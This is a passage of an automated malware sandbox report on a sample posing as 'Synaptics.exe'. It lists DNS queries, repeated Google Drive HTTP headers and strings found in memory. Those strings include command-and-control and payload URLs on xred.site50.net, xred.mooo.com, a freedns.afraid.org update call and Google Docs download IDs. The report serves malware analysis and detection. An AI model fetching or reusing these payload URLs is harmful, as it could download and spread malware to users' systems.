sh.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: docs.google.com
                          Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                          Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ESPAnwcEORxv5p8CaLRmq2JSfZSC5hVBsHa5VCfAxhQX4g_w9awq9Vk4aWnkJyui-I3bvJhkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:19 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qtThlVbzU-ZOr8HMLo0ehw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=qV6rTPWO8kpOHQ3mFtatW_ZseHmoLbgRYSqKkPwUEswZ4Y_LTJwPQr25o9sVjHpeGD0VKTZCD8drPB2qk5P5Ab0M0pvX0_ZvnIAdmjC7_UDvYU4yDVCjXtG5slbudraDZ_YhuVNtqq2CXG95knkGbXPKUsCWT9bmPblH5P3k3YIOIUfHgy-nnqU; expires=Tue, 01-Jul-2025 10:49:19 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6rDPlt-SAHHumlIj5byG2IKf-jgpwLBwl0unZTFwbt5VUNBIlhDHyJVQSGZT4XVH1jContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:19 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TUYv8N5SmqvDCGP0Kra8dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU; expires=Tue, 01-Jul-2025 10:49:19 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7GKPgiQtq6bl4V02ugncB5OHfiNo_SoIRf2g1LaneoyB9Hyvx6l3DWdM41o1gzivFGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:21 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wH2-ty5DeJGacJp0u2n8HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=N4o1QVHeRgToqi6PnzM7a9AWDqDNpp5iKvqa-6LRvuOdQrVAYMrf5I2OKNUBbU2VitAEs5OSY2ydQ1MUIvKAcrUbZ8lXCV17u352mktvNEWwdZ6EiHvAKFqf0w6u7mIHAssjMaQVw3jVByZXOTLMR-g-8JMbikLyJt-ATRYZLNBSrxRkcLnB7-Dp; expires=Tue, 01-Jul-2025 10:49:21 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zIzCrrM_LMVkk8dm062WGmC-SjW9ndIMFOZ5dn7_WUSR_fjO2G4nfX3HtcWPWbmY2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:21 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-6wa03LzFRxw5PAugiy2OXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=DzX7dWpPgzFIJGfvg8ExuN2uMfaRPG_SwGcGHj08e7zdKKBpeydjRYdTU7Pw_u6pf3u1Bdk_KNnra7AxEZvvcChZB6HGPJvsJYwgunQQpb5mMfvbvIuzv4B9S99kU569f0MaVSlYJvWSVjciHMhvKHZymr9l7G18ZFAVOLb9ajtrLW5ppQvyPm4; expires=Tue, 01-Jul-2025 10:49:21 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4MSMcMYdrqW-DJWXb7zMENZlOn0XGfN7zsffyzPOay7_4RNBubjtA92erSHGgpLzwkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0JI98NROO5hh--RgVA3zrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4U_peNXljvIHZoDEZg78g6BskECuHi44MXb7gumbvSGFltC4A8fu0vU9LiRklWxVUfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-y9_sbqWLfDeDEKMTKrCEyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6PJaqnq5uz0yQXOF-rbw6RTpyfBrVw1q44YYQz_STxntOTfrPihk1ukhov0zQydG03Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:24 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-1H1iy6TijaKai38xS3og4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4S5g4t3SWXij-KClfUemaXlB8_rsvtspU9fV1I3vaG3hveboCsX_eMR7Zi-p1gUS32IPQaGxMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:24 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-jwYAdiakL0FSGzT3UMPO5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC50BE3-2LStuuc5rp9xFH-Pn9KVXI6x6tMBqiT5Zxc4yHbyNJgYC0wycPhnaXkAwrDFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:39 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-kJNzl2MIYswmXG7sa4wXVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Yg-_WH4y30xhRrrEG3jTfvLYeNTooJW30ylJ6Iggtz7UblDYnQWJJsqU-757OIJ0yContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:49:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-HZlhWaCROmmg7RIlfcTmyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: MSID754.tmp.2.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978p
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978w)
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x
                          Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlD
                          Source: MSID754.tmp.2.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                          Source: MSID754.tmp.2.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                          Source: MSID754.tmp.2.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarh
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Microsoft
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/d
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloa
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/user
                          Source: Synaptics.exe, 00000004.00000002.1608743337.000000000616E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                          Source: MSID754.tmp.2.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                          Source: MSID754.tmp.2.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000986000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1398475623.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                          Source: Synaptics.exe, 00000004.00000002.1610878699.0000000007EBE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(f
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-CH-U
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.recaptcha-cn.net
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.user
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0u
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download29
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download42
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download90px;min-height:180px;padd
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
